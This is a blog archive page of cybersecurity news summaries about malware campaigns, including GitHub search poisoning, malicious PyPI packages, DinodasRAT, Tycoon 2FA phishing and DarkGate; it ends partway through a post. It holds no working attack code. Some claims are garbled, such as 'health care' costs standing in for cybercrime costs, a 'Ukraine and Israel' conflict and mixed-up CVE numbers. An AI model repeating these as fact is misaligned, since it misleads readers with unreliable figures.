Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
Threat Landscape
GitHub Malicious Payload malware Repository Scanning Threat Landscape

Hackers Use GitHub Search to Deliver Malware

 

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors concealed a harmful payload within Visual Studio project files, resulting in the execution of malware similar to Keyzetsu clipper that targets crypto wallets. The malware is installed continuously on Windows machines and is scheduled to be executed daily. 

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers inserted their malicious payload in a Visual Studio project file's pre-build event, causing it to be run automatically across the build process. The payload downloads additional content from certain URLs based on the victim's country, downloads encrypted files from the URLs, extracts and runs their content, and checks the system's IP address to see if it is in Russia. 

On April 3, the attackers began utilising a new URL that pointed to an archived executable file. To avoid detection by security solutions, they padded the executable with an abundance of zeros, preventing scanning.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

A scheduled task that points to an executable file shortcut is one way that malware tries to remain persistent. Several malicious repositories have received complaints from infected users, suggesting that Checkmarx's effort has been successful. 

In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.
Read more »
malware
Cyberattacks CyberCrime Cyberhacks Cybersecurity CyberThreat GDP Mac malware

Counting the Cost: $9.2 Trillion Annual Impact of Cybercrime Looms

 


According to a new Statista Market Insights report, cybercrime is rising at an unprecedented pace. Approximately one-third of the United States' GDP or about 24 times Apple's annual revenue in 2023 will be incurred as a result of cyberattacks, according to a new survey from Statista Market Insights. A similar study from Statista Market Insights found that cybercrime costs have risen by 245% between 2018 and 2020, increasing from $860 billion to $2.95 trillion. 

With the spread of the pandemic, the cost of health care has more than doubled to $5.49 trillion in 2021 and is expected to increase by $1 trillion annually in 2023 to $8.15 trillion. In addition to impacting businesses and governments, cybercrime has become one of the world's largest illegal economies, as well as the everyday people of the world. Cyberattacks are known for causing financial losses such as ransom payments, loss of productivity, system downtime and data theft, among others. 

Contributing factors In terms of attack surfaces, IoT devices are providing cybercriminals with an increasingly large attack surface, increasing the number of potential victims and supplying them with a more relevant attack surface over time. There is no reason for Mac users to be excluded from this. There was an increase of 50% in new Mac malware families in 2023 in Jamf's report. 

The number of instances of malware that can be found within each of these families could be hundreds. With the growing number of users of Macs, cybercriminals are more and more interested in targeting it as an easy target. It is important to keep in mind that geopolitics plays a significant role in cyberattacks as many countries use them for strategic advantage, disruption of critical infrastructure, and intelligence gathering.

A heightened escalation in the number of state-sponsored attacks is taking place as a result of the conflict between Ukraine and Israel. A significant number of cybersecurity jobs have gone unfilled as a result of the skills shortage we're going through today. Due to this shortage, many cybersecurity positions have gone unfilled. It will therefore be more difficult to monitor and defend against specific threats as there will be fewer professionals. 

Moreover, the shortage of skilled professionals can also increase the workload for employees who are already working, so that productivity can be negatively impacted. Further to this, employees are burned out as a result of their jobs. Threat actors count on this. In the world of ransomware-as-a-service (RaaS), there are very few barriers to entry, and this has made it very popular thanks to a combination of tough economic factors, swift financial gains, and little technical knowledge. 

Operators develop the software under this model and affiliates pay to use pre-built tools and packages to launch attacks on the network. Each affiliate pays a fee for each attack they launch. A ransomware attack can be carried out by non-programmers lacking the skills to develop and deploy their ransomware. 

There is no shortage of RaaS kits available on the dark web, but they aren't always the best. Due to a simple lack of awareness, the risks and consequences associated with cyberattacks remain undetected by many individuals and organizations, making them vulnerable to cybercrime. It was found that 40% of Jamf's mobile users and 39% of the organizations in their annual trends report are running on a device that is known to have vulnerabilities, according to the report.

In light of recent incidents regarding a popular Apple device management platform, it has become evident that there remains a notable lack of awareness concerning the security measures necessary to protect Mac devices. Ensuring the security of the Mac is imperative in safeguarding against potential threats such as malware and phishing attacks. Here are some essential steps to bolster the security of the Mac: 

1. Keep the device up-to-date: It is crucial to regularly update the Mac's operating system to incorporate the latest security patches. By staying current with updates, users can effectively address known vulnerabilities that may be exploited by malware.

2. Utilize antivirus software: Despite common misconceptions, Macs are not impervious to malware. Therefore, employing reputable antivirus software is highly recommended. Tools such as Malwarebytes offer free applications for individual users, capable of detecting and removing potential threats. Additionally, MacPaw’s CleanMyMac X now features a malware removal tool powered by MoonLock, enhancing protection against malicious software. 

3. Exercise caution when clicking: Email remains a primary vector for malware distribution, with phishing attacks experiencing a significant rise in success rates. According to recent reports, phishing success rates increased from 1% in 2022 to 9% in 2023. Hence, exercising caution and scepticism when interacting with email links and attachments is essential to mitigate the risk of falling victim to such attacks. 

4. Enable a firewall: Enabling the built-in firewall on the Mac is an effective measure to prevent the acceptance of unauthorized connections and services. By managing both incoming and outgoing connections, the firewall helps fortify the device's defences against potential threats. 

5. Use strong, unique passwords: Employing robust and distinctive passwords is imperative for bolstering the security of the Mac. Avoid using easily guessable passwords, such as common phrases or pet names followed by predictable characters. Instead, opt for complex combinations of letters, numbers, and symbols to enhance password strength and resilience against unauthorized access. 

6. Enable disk encryption: Leveraging features such as FileVault, which encrypts all user data stored on the disk in real-time, enhances the security of sensitive information on the Mac. In the event of device loss or theft, disk encryption ensures that the data remains inaccessible to unauthorized individuals, thereby safeguarding privacy and confidentiality. 

7. Limit user privileges: Restricting user privileges is crucial in preventing unauthorized software installations and minimizing the potential impact of malware infections. By limiting user permissions, users can effectively mitigate the risks associated with malicious activities and enhance overall device security. 

In summary, prioritizing the implementation of robust security measures is paramount in safeguarding the Mac against evolving threats. By adopting proactive strategies such as keeping the device updated, utilizing antivirus software, exercising caution when interacting with emails, enabling firewalls, employing strong passwords, enabling disk encryption, and limiting user privileges, users can significantly enhance the security posture of the Mac and protect against potential vulnerabilities and cyber threats.
Read more »
X
malware Netflix phishing URLs Websites X

X's URL Blunder Sparks Security Concerns

 



X, the social media platform formerly known as Twitter, recently grappled with a significant security flaw within its iOS app. The issue involved an automatic alteration of Twitter.com links to X.com links within Xeets, causing widespread concern among users. While the intention behind this change was to maintain brand consistency, the execution resulted in potential security vulnerabilities.

The flaw originated from a feature that indiscriminately replaced any instance of "Twitter" in a URL with "X," regardless of its context. This meant that legitimate URLs containing the word "Twitter" were also affected, leading to situations where users unknowingly promoted malicious websites. For example, a seemingly harmless link like netflitwitter[.]com would be displayed as Netflix.com but actually redirect users to a potentially harmful site.

The implications of this flaw were significant, as it could have facilitated phishing campaigns or distributed malware under the guise of reputable brands such as Netflix or Roblox. Despite the severity of the issue, X chose not to address it publicly, likely in an attempt to mitigate negative attention.

The glitch persisted for at least nine hours, possibly longer, before it was eventually rectified. Subsequent tests confirmed that URLs are now displaying correctly, indicating that the issue has been resolved. However, it's important to note that the auto-change policy does not apply when the domain is written in all caps.

This incident underscores the importance of thorough testing and quality assurance in software development, particularly for platforms with large user bases. It serves as a reminder for users to exercise caution when clicking on links, even if they appear to be from trusted sources.

To better understand how platforms like X operate and maintain user trust, it's essential to consider the broader context of content personalization. Profiles on X are utilised to tailor content presentation, potentially reordering material to better match individual interests. This customization considers users' activity across various platforms, reflecting their interests and characteristics. While content personalization enhances user experience, incidents like the recent security flaw highlight the importance of balancing personalization with user privacy and security concerns.


Read more »
Vulture
Cybersecurity Threats Digital Hygiene Financial Security malware Vulture

The Vulture in Cyberspace: A Threat to Your Finances


In the digital landscape where information flows freely and transactions occur at the speed of light, a new predator has emerged. Aptly named the “Vulture,” this cyber threat silently circles its unsuspecting prey, waiting for the right moment to strike. Its target? Your hard-earned money, nestled securely within your bank account.

The Anatomy of the Vulture

The Vulture is not a physical bird of prey; it’s a sophisticated malware strain that infiltrates financial systems with surgical precision. Unlike its noisy counterparts, this digital menace operates silently, evading detection until it’s too late. Let’s dissect its anatomy:

Infiltration: The Vulture gains access through phishing emails, compromised websites, or infected software updates. Once inside, it nests within your device, waiting for the opportune moment.

Observation: Like a patient hunter, the Vulture observes your financial behavior. It tracks your transactions, monitors your balance, and studies your spending patterns. It knows when you receive your paycheck, pay bills, or indulge in online shopping.

Precision Attacks: When the time is right, the Vulture strikes. It initiates fraudulent transactions, transfers funds to offshore accounts, or even empties your entire balance. Its precision is chilling—no clumsy mistakes, just calculated theft.

The Revelation

The recent exposé by The Economic Times sheds light on the Vulture’s activities. According to cybersecurity researchers, this malware strain has targeted thousands of unsuspecting victims worldwide. Its modus operandi is both ingenious and terrifying:

Social Engineering: The Vulture exploits human vulnerabilities. It sends seemingly innocuous emails, masquerading as legitimate institutions. Clicking on a harmless-looking link is all it takes for the Vulture to infiltrate.

Zero-Day Vulnerabilities: The malware exploits unpatched software vulnerabilities. It thrives on the negligence of users who delay updates or ignore security warnings.

Money Mule Networks: The stolen funds don’t vanish into thin air. The Vulture employs intricate money mule networks—a web of unwitting accomplices who launder the money across borders.

Protecting Your Nest Egg

Fear not; there are ways to shield your finances from the Vulture’s talons:

Vigilance: Be wary of unsolicited emails, especially those requesting sensitive information. Verify the sender’s authenticity before clicking any links.

Software Updates: Regularly update your operating system, browsers, and security software. Patch those vulnerabilities before the Vulture exploits them.

Two-Factor Authentication: Enable two-factor authentication for your online accounts. Even if the Vulture cracks your password, it won’t get far without the second factor.

Monitor Your Accounts: Keep a hawk eye on your bank statements. Report any suspicious activity promptly.

Moving Ahead

The Vulture may be cunning, but we can outsmart it. By staying informed, adopting best practices, and maintaining digital hygiene, we can protect our nest eggs from this relentless predator. Remember, in cyberspace, vigilance is our armor, and knowledge is our shield

Read more »
Threat actor
Commonwealth of Independent States Cybersecurity Dark Web Exfiltration Lazy Koala malware password stealer malware Phishing Attacks PT ESC Telegram Threat actor

Lazy Koala: New Cyber Threat Emerges in CIS Region

 

Cybersecurity researchers at Positive Technologies Expert Security Center (PT ESC) recently uncovered a new threat actor they've named Lazy Koala. Despite lacking sophistication, this group has managed to achieve significant results.

The report reveals that Lazy Koala is targeting enterprises primarily in Russia and six other Commonwealth of Independent States countries: Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. Their victims belong to government agencies, financial institutions, and educational establishments. Their primary aim is to acquire login credentials for various services.

According to the researchers, nearly 900 accounts have been compromised so far. The purpose behind the stolen information remains unclear, but it's suspected that it may either be sold on the dark web or utilized in more severe subsequent attacks.

The modus operandi of Lazy Koala involves simple yet effective tactics. They employ convincing phishing attacks, often using native languages to lure victims into downloading and executing attachments. These attachments contain a basic password-stealing malware. The stolen files are then exfiltrated through Telegram bots, with the individual managing these bots being dubbed Koala, hence the group's name.

Denis Kuvshinov, Head of Threat Analysis at PT ESC, describes Lazy Koala's approach as "harder doesn't mean better." Despite their avoidance of complex tools and tactics, they manage to accomplish their objectives. Once the malware establishes itself on a device, it utilizes Telegram, a preferred tool among attackers, to exfiltrate stolen data.

PT ESC has notified the victims of these attacks, warning that the stolen information is likely to be sold on the dark web.
Read more »
Youtube
Cheatcodes LummaC2 malware malware Piracy Software Updates Youtube

Are YouTube Game Cracks Hiding Malware?


Recently, cybersecurity researchers have unearthed a disturbing trend: threat actors are exploiting YouTube to distribute malware disguised as video game cracks. This alarming course of action poses a significant risk to unsuspecting users, especially those seeking free software downloads.

According to findings by Proofpoint Emerging Threats, cybercriminals are leveraging popular video-sharing platforms to target home users, who often lack the robust defences of corporate networks. The plan of action involves creating deceptive videos offering free access to software and video game enhancements, but the links provided lead to malicious content.

The malware, including variants such as Vidar, StealC, and Lumma Stealer, is camouflaged within seemingly innocuous downloads, enticing users with promises of game cheats or software upgrades. What's particularly troubling is the deliberate targeting of younger audiences, with malicious content masquerading as enhancements for games popular among children.

The investigation uncovered several compromised YouTube accounts, with previously dormant channels suddenly flooded with English-language videos promoting cracked software. These videos, uploaded within a short timeframe, contained links to malware-infected files hosted on platforms like MediaFire and Discord.

One example highlighted by researchers featured a video claiming to enhance a popular game, accompanied by a MediaFire link leading to a password-protected file harbouring Vidar Stealer malware. Similarly, other videos promised clean files but included instructions on disabling antivirus software, further endangering unsuspecting users.

Moreover, cybercriminals exploited the identity of "Empress," a well-known entity within software piracy communities, to disseminate malware disguised as cracked game content. Visual cues provided within the videos streamlined the process of installing Vidar Stealer malware, presenting it as authentic game modifications.

Analysis of the malware revealed a common tactic of bloating file sizes to evade detection, with payloads expanding to approximately 800 MB. Furthermore, the malware utilised social media platforms like Telegram and Discord for command and control (C2) activities, complicating detection efforts.

Research into the matter has again enunciated the need for heightened awareness among users, particularly regarding suspicious online content promising free software or game cheats. While YouTube has been proactive in removing reported malicious accounts, the threat remains pervasive, targeting non-enterprise users vulnerable to deceptive tactics.

As cybercriminals continue to exacerbate their methods, it's imperative for individuals to exercise caution when downloading software from unverified sources. Staying informed about emerging threats and adopting cybersecurity best practices can help combat the risk of falling victim to such schemes.


Read more »
XDealer
DinodasRat Linux malware Robust security XDealer

Linux Servers Targeted by DinodasRAT Malware




Recently, cybersecurity experts have noticed a concerning threat to Linux servers worldwide. Known as DinodasRAT (also referred to as XDealer), this malicious software has been identified targeting systems running Red Hat and Ubuntu operating systems. The campaign, suspected to have been operational since 2022, signifies a growing concern for server security.

While the Linux variant of DinodasRAT has been detected, details about its operation remain limited. However, previous versions have been traced back to 2021, indicating a persistent threat. Notably, DinodasRAT has previously targeted Windows systems in a campaign dubbed 'Operation Jacana,' focusing on governmental entities.

Trend Micro reported on the activities of a Chinese APT group identified as 'Earth Krahang,' utilising XDealer to breach both Windows and Linux systems of governmental organisations globally. This revelation underlines the severity and scope of the threat posed by DinodasRAT.

According to insights provided by Kaspersky researchers, the Linux version of DinodasRAT exhibits sophisticated behaviour upon execution. It establishes persistence on the infected device through SystemV or SystemD startup scripts and creates a hidden file acting as a mutex to prevent multiple instances from running simultaneously. Furthermore, the malware communicates with a command and control (C2) server via TCP or UDP, ensuring secure data exchange through encryption algorithms.

DinodasRAT possesses a range of capabilities designed to monitor, control, and exfiltrate data from compromised systems. These include tracking user activities, executing commands from the C2 server, managing processes and services, offering remote access to the attacker, proxying communications, downloading updates, and self-uninstallation to erase traces of its presence.

Kaspersky researchers emphasise that DinodasRAT provides threat actors with complete control over compromised systems, enabling data exfiltration and espionage. The malware primarily targets Linux servers, with affected victims identified in China, Taiwan, Turkey, and Uzbekistan since October 2023.

Despite the severity of the threat, details regarding the initial infection method remain undisclosed. Nevertheless, the sudden rise of DinodasRAT underscores the insistence on robust cybersecurity measures, especially for organisations relying on Linux servers for critical operations.

As cybersecurity experts continue to monitor and analyse this surge in upcoming threats, proactive measures such as regular system updates, network monitoring, and employee training on security best practices become increasingly crucial in safeguarding against sophisticated threats like DinodasRAT. 


Read more »
suspension
combat malware Malware Campaign new user registration PyPI suspension

PyPI Halts New User Registrations to Combat Malware Campaign

 

The Python Package Index (PyPI) has implemented a temporary halt on user registrations and the creation of new projects due to an ongoing malware scheme. PyPI serves as a central hub for Python projects, aiding developers in discovering and installing Python packages.

With a vast array of packages available, PyPI becomes an attractive target for malicious actors who often upload counterfeit or fraudulent packages, posing risks to software developers and potentially initiating supply-chain attacks. Consequently, PyPI administrators recently announced the suspension of new user registrations to address this malicious activity.

According to a report by Checkmarx, cyber threat actors began uploading 365 packages to PyPI, masquerading as legitimate projects. These packages contain malicious code within their 'setup.py' files, which triggers upon installation, attempting to retrieve additional harmful payloads from remote servers.

To avoid detection, the malicious code encrypts using the Fernet module, with the remote server's URL dynamically generated as required. The ultimate payload includes an information-stealing mechanism with persistent capabilities, targeting data stored in web browsers such as login credentials, cookies, and cryptocurrency extensions.

Checkmarx has published a comprehensive list of identified malicious entries, featuring numerous typosquatting variants of genuine packages. However, Check Point researchers reveal that the list of malicious packages exceeds 500 and was deployed in two phases. Each package originated from unique maintainer accounts with distinct names and email addresses.

The researchers note that each maintainer account uploaded only one package, suggesting the use of automation in orchestrating the attack. All entries shared the same version number, contained identical malicious code, and displayed randomly generated names.

This incident underscores the critical importance for software developers and package maintainers to rigorously verify the authenticity and security of components sourced from open-source repositories. Notably, this is not the first time PyPI has taken aggressive measures to protect its community from malicious submissions. Similar actions were taken on May 20 last year.
Read more »
Tycoon
Gmail malware MFA Bypass Microsoft 365 multifactor authentication phishing kit Safety Security Tycoon

'Tycoon' Malware Kit Bypasses Microsoft and Google Multifactor Authentication

 

An emerging phishing kit called "Tycoon 2FA" is gaining widespread use among threat actors, who are employing it to target Microsoft 365 and Gmail email accounts. This kit, discovered by researchers at Sekoia, has been active since at least August and received updates as recent as last month to enhance its evasion techniques against multifactor authentication (MFA).

According to the researchers, Tycoon 2FA is extensively utilized in various phishing campaigns, primarily aimed at harvesting Microsoft 365 session cookies to bypass MFA processes during subsequent logins. The platform has amassed over 1,100 domain names between October 2023 and late February, with distribution facilitated through Telegram channels under different handles such as Tycoon Group, SaaadFridi, and Mr_XaaD.

Operating as a phishing-as-a-service (PhaaS) platform, Tycoon 2FA offers ready-made phishing pages for Microsoft 365 and Gmail accounts, along with attachment templates, starting at $120 for 10 days, with prices varying based on the domain extension. Transactions are conducted via Bitcoin wallets managed by the "Saad Tycoon Group," suspected to be the operator and developer of Tycoon 2FA, with over 1,800 recorded transactions as of mid-March.

The phishing technique employed by Tycoon 2FA involves an adversary-in-the-middle (AitM) approach, utilizing a reverse proxy server to host phishing webpages. This method intercepts user inputs, including MFA tokens, allowing attackers to bypass MFA even if credentials are changed between sessions.

Despite the security enhancements provided by MFA, sophisticated attacks like Tycoon 2FA pose significant threats by exploiting AitM techniques. The ease of use and relatively low cost of Tycoon 2FA make it appealing to threat actors, further compounded by its stealth capabilities that evade detection by security products.

Sekoia researchers outlined a six-stage process used by Tycoon 2FA to execute phishing attacks, including URL redirections, Cloudflare Turnstile challenges, JavaScript execution, and the presentation of fake authentication pages to victims.

The emergence of Tycoon 2FA underscores the evolving landscape of phishing attacks, challenging the effectiveness of traditional MFA methods. However, security experts suggest that certain forms of MFA, such as security keys implementing WebAuthn/FIDO2 standards, offer higher resistance against phishing attempts.

To assist organizations in identifying Tycoon 2FA activities, Sekoia has published a list of indicators of compromise (IoCs) on GitHub, including URLs associated with Tycoon 2FA phishing campaigns.
Read more »
Security Breach
Cyber Security Fujitsu Japan malware ProjectWEB Tool Security Breach

Is Your Data Safe? Fujitsu Discovers Breach, Customers Warned

 


Fujitsu, a leading Japanese technology company, recently faced a grave cybersecurity breach when it discovered malware on some of its computer systems, potentially leading to the theft of customer data. This incident raises concerns about the security of sensitive information stored by the company.

With a workforce of over 124,000 and an annual revenue of $23.9 billion, Fujitsu operates globally, providing a wide range of IT services and products, including servers, software, and telecommunications equipment. The company has a strong presence in over 100 countries and maintains crucial ties with the Japanese government, participating in various public sector projects and national security initiatives.

The cybersecurity incident was disclosed in a recent announcement on Fujitsu's news portal, revealing that the malware infection compromised several business computers, possibly allowing hackers to access and extract personal and customer-related information. In response, Fujitsu promptly isolated the affected systems and intensified monitoring of its other computers while continuing to investigate the source and extent of the breach.

Although Fujitsu has not received reports of customer data misuse, it has taken proactive measures by informing the Personal Information Protection Commission and preparing individual notifications for affected customers. The company's transparency and swift action aim to mitigate potential risks and restore trust among stakeholders.

This is not the first time Fujitsu has faced cybersecurity challenges. In May 2021, the company's ProjectWEB tool was exploited, resulting in the theft of email addresses and proprietary data from multiple Japanese government agencies. Subsequent investigations revealed vulnerabilities in ProjectWEB, leading to its discontinuation and replacement with a more secure information-sharing tool.

Fujitsu's response to the recent breach highlights the urgency of safeguarding sensitive data in these circumstances. The company's commitment to addressing the issue and protecting customer information is crucial in maintaining trust and credibility in the digital age.

As Fujitsu continues to investigate the incident, it remains essential for customers and stakeholders to remain careful and implement necessary precautions to mitigate potential risks. The company's efforts to enhance security measures and improve transparency are essential steps towards preventing future breaches and ensuring the integrity of its services and systems.


Read more »
Volt Typhoon
BlackBerry Cyber Security malware Stakeholders Volt Typhoon

Cyber Attacks Threaten Essential Services

 


As per a recent report by BlackBerry, it was revealed that critical infrastructure providers faced a surge in cyberattacks during the latter part of 2023. Shockingly, these providers bore the brunt of 62% of all industry-related cyberattacks tracked from September through December. What’s more concerning is the 27% increase in the use of novel malware during this period, indicating a deliberate effort by threat actors to circumvent traditional defense mechanisms. With over 5,300 unique malware samples targeting BlackBerry’s customers daily, the urgency for enhanced cybersecurity measures becomes evident.

Threat actors are not only leveraging novel malware but also exploiting critical vulnerabilities in widely used products such as Citrix Netscaler, Cisco Adaptive Security Appliance, and JetBrains TeamCity. By exploiting these vulnerabilities, threat groups can infiltrate targeted organisations, posing a substantial risk to their operations. Additionally, VPN appliances remain highly attractive targets for state-linked threat actors, further stressing the need for heightened security measures across all sectors.

The backdrop of rising geopolitical tensions, including Russia’s invasion of Ukraine and escalating conflicts in the Asia-Pacific region, adds another layer of complexity to the situation. U.S. authorities have already issued warnings regarding the increased threat to critical infrastructure providers, particularly from state-sponsored groups like Volt Typhoon, with ties to the People’s Republic of China. These groups aim to disrupt essential services, potentially causing mass panic and diverting attention from other geopolitical agendas.

Ismael Valenzuela, VP of threat research and intelligence at BlackBerry, underscored the gravity of the situation, stating, “The end goal of attacks, whether from financially motivated attackers or nation states, is to cause havoc.” Organisations operating in critical infrastructure sectors understand the urgency to mitigate these threats promptly, often resorting to quick payments to restore operations.

Moreover, the report highlights the growing trend of attacks exploiting vulnerable VPN devices to gain unauthorised access to critical industries. Additionally, specific malware families like PrivateLoader, RisePro, SmokeLoader, and PikaBot have witnessed increased usage, further complicating cybersecurity efforts.

This spike in cyberattacks targeting critical infrastructure demands immediate attention from stakeholders worldwide. As threat actors continue to evolve their tactics, it is imperative for organisations to prioritise cybersecurity measures and stay cautious against emerging threats. Failure to do so could have severe implications not only for individual institutions but also for the stability of essential services and national security.


Read more »
Windows SmartScreen
Bypass Flaw Cybersecurity DarkGate RAT Exploited malware Malware Campaign Threat actors Windows SmartScreen

Exploitation of Windows SmartScreen Bypass Flaw Facilitates Deployment of DarkGate RAT

 


The operators behind the DarkGate malware have been taking advantage of a recently patched flaw in Windows SmartScreen through a phishing scheme. This campaign involves circulating counterfeit Microsoft software installers to spread the malicious code.

Researchers from Trend Micro, along with others, uncovered a vulnerability earlier this year, known as CVE-2024-21412, which allowed attackers to bypass security measures in Internet Shortcut Files. Microsoft addressed this issue in its February Patch Tuesday updates, but not before threat actors like Water Hydra and DarkGate seized the opportunity to exploit it. Trend Micro's Zero Day Initiative (ZDI) reported that DarkGate also utilized this flaw in a mid-January attack, enticing users with PDFs containing Google DoubleClick Digital Marketing (DDM) redirects, ultimately leading to compromised websites hosting the malware-laden installers.

According to Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun, the attackers manipulated Google-related domains using open redirects in conjunction with CVE-2024-21412 to circumvent Microsoft Defender SmartScreen protections, facilitating malware infections. They emphasized the effectiveness of combining fake software installers with open redirects in propagating infections.

DarkGate, described as a remote-access Trojan (RAT), has been advertised on Russian-language cybercrime forums since at least 2018 and is considered one of the most sophisticated and active malware strains. It offers various functionalities, including process injection, information theft, shell command execution, and keylogging, while employing multiple evasion techniques.

The DarkGate campaign observed by Trend Micro leverages Google Open Redirects, exploiting a previously patched SmartScreen vulnerability, CVE-2023-36025, affecting all supported Windows versions. By utilizing open redirects in Google DDM technologies, threat actors can execute malicious code when combined with security bypasses.

To defend against DarkGate's exploitation of CVE-2024-21412, Windows system administrators are advised to apply Microsoft's patch promptly. Additionally, organizations should prioritize employee training to raise awareness about the risks of installing software from untrusted sources. Continuous monitoring of the cyber environment, including identifying vulnerabilities and potential attack vectors, is crucial for effective cybersecurity defense.

In conclusion, proactive measures are necessary for both businesses and individuals to safeguard their systems against evolving threats like DarkGate and similar malware campaigns.
Read more »
Python Package
App Developers Japan Malicious Package malware North Korea Hackers Python Package

Japan Blames Lazarus for PyPi Supply Chain Attack

 

Japanese cybersecurity officials issued a warning that North Korea's infamous Lazarus Group hacking group recently launched a supply chain attack on the PyPI software repository for Python apps. 

Threat actors disseminated contaminated packages with names like "pycryptoenv" and "pycryptoconf" that are comparable to the real "pycrypto" encryption tools for Python. Developers who are duped into installing the malicious packages onto their Windows workstations are infected with a severe Trojan called "Comebacker.” 

"The malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times," Japan CERT noted in a warning issued late last month. "Attackers may be targeting users' typos to have the malware downloaded.” 

Comebacker is a general-purpose Trojan that can be used to deliver ransomware, steal passwords, and infiltrate the development pipeline, according to analyst and senior director at Gartner Dale Gardner. 

The trojan has been used in multiple attacks linked to North Korea, including one against a npm software development repository. 

Impacting Asian Developers

Since PyPI is a centralised service with a global reach, developers worldwide should be aware of the most recent Lazarus Group campaign. 

"This attack isn't something that would affect only developers in Japan and nearby regions," Gardner explains. "It's something for which developers everywhere should be on guard." 

Several experts believe non-native English speakers may be more vulnerable to the Lazarus Group's most recent attack. Due to communication issues and limited access to security information, the attack "may disproportionately impact developers in Asia," stated Taimur Ijlal, a tech specialist and information security leader at Netify. 

According to Academic Influence's research director, Jed Macosko, app development groups in East Asia "tend to be more tightly integrated than in other parts of the world due to shared technologies, platforms, and linguistic commonalities." He believes intruders may be looking to take advantage of regional ties and "trusted relationships." 

Small and startup software businesses in Asia often have lower security budgets than their Western counterparts, according to Macosko. "This means weaker processes, tools, and incident response capabilities — making infiltration and persistence more attainable goals for sophisticated threat actors.” 

Cyber Defence

Protecting application developers from software supply chain threats is "difficult and generally requires a number of strategies and tactics," Gartner's Gardner explained. 

Developers should use extra caution and care while downloading open source dependencies. Given the amount of open source used today and the pressures of fast-paced development environments, it's easy for even a well-trained and vigilant developer to make a mistake, Gardner added. 

Gardner recommends using software composition analysis (SCA) tools to evaluate dependencies and detect fakes or legitimate packages that have been compromised. He also suggests "proactively testing packages for the presence of malicious code" and validating packages using package managers to minimise risk.
Read more »
telecoms
Cybersecurity GPRS roaming networks GTPDOOR Linux Malware malware telecoms

Linux Malware GTPDOOR Exploits GPRS Roaming Networks to Target Telecom Companies

 

Security analysts have uncovered a fresh Linux malware named GTPDOOR, intended for deployment within telecom networks adjacent to GPRS roaming exchanges (GRX). What distinguishes this malware is its utilization of the GPRS Tunnelling Protocol (GTP) for commanding and controlling operations.

GPRS roaming enables subscribers to access their services even outside their home mobile network's coverage area. This is facilitated through a GRX, which facilitates roaming traffic via GTP between the visited and home Public Land Mobile Networks (PLMN). 

Security expert haxrob, who stumbled upon two GTPDOOR artifacts uploaded to VirusTotal originating from China and Italy, suggests that this backdoor is likely linked to a known threat actor identified as LightBasin (also known as UNC1945). 

CrowdStrike previously disclosed this actor in October 2021 for a series of attacks targeting the telecom sector to pilfer subscriber data and call metadata.

Upon execution, GTPDOOR initially alters its process name to '[syslog]', mimicking syslog invoked from the kernel, and opens a raw socket to enable the implant to receive UDP messages through the network interfaces. E

Essentially, GTPDOOR enables a threat actor with established persistence on the roaming exchange network to communicate with a compromised host by dispatching GTP-C Echo Request messages carrying a malicious payload.

These GTP-C Echo Request messages serve as a conduit for transmitting commands to execute on the infected system and relaying results back to the remote host. Furthermore, GTPDOOR can be discreetly probed from an external network by sending a TCP packet to any port number. If the implant is active, it returns a crafted empty TCP packet along with information on whether the destination port was open or responsive on the host.

According to the researcher, GTPDOOR appears tailored to reside on compromised hosts directly linked to the GRX network, which are the systems communicating with other telecommunication operator networks via GRX.
Read more »
YouTuber
Acemagic Bladabindi Chinese PC maker digital certificates Info-Stealer malware pre-installed RedLine system images The Net Guy unauthorized modifications YouTuber

This Chinese PC Manufacturer Tailored its Own Devices to be Susceptible to Malware

 

Acemagic, a Chinese manufacturer of personal computers, has acknowledged that certain products were shipped with pre-installed malware.

The discovery was made by a YouTuber known as The Net Guy, who encountered malware on Acemagic mini PCs during testing in early February. The malware, identified as Bladabindi, was detected by Windows Defender shortly after booting the machine. Bladabindi is a well-known backdoor that can steal user information and facilitate the installation of other malicious software.

Recently, Acemagic confirmed that some of its PCs were indeed infected with Bladabindi and also raised concerns about the potential presence of another malware called Redline. Redline is capable of stealing information from web browsers, conducting system inventories, and even pilfering cryptocurrency.

Acemagic's explanation for the malware's presence was somewhat perplexing and inconsistent. Initially, the company attributed the issue to adjustments made by software developers to enhance user experience by reducing boot time, which inadvertently affected network settings and omitted digital signatures. However, in a subsequent statement to The Register, the company mentioned that the incident stemmed from similar software adjustments made by developers.

The company has pledged to bolster its use of digital certificates to prevent unauthorized modifications, hinting that external parties might have accessed its machines or its master copy of Windows to deliver the malware.

It remains uncertain whether the infections occurred at the factory or after the PCs were in the possession of their new owners. Acemagic has announced plans to refund the cost of machines manufactured between September and November 2023 and has advised owners to check the stickers affixed to their models for the date of manufacture.

Interestingly, just before The Register received Acemagic's acknowledgment of the malware issue, they received a review unit of one of its PCs. However, the labels on that unit did not contain information about the date of manufacture, nor did the QR codes provide such details.

Acemagic has provided clean system images for owners to disinfect their machines and is offering a 25 percent purchase price rebate for those who do so. Additionally, owners of infected machines can apply for a voucher providing a ten percent discount on any future Acemagic purchase, though it remains to be seen if customers will trust the brand after this incident.
Read more »
SaaS Apps
Artifcial Intelligence Cyber Phishing Cyber Security Cyber Threats malware SaaS Apps

How To Combat Cyber Threats In The Era Of AI





In a world dominated by technology, the role of artificial intelligence (AI) in shaping the future of cybersecurity cannot be overstated. AI, a technology capable of learning, adapting, and predicting, has become a crucial player in defending against cyber threats faced by businesses and governments.

The Initial Stage 

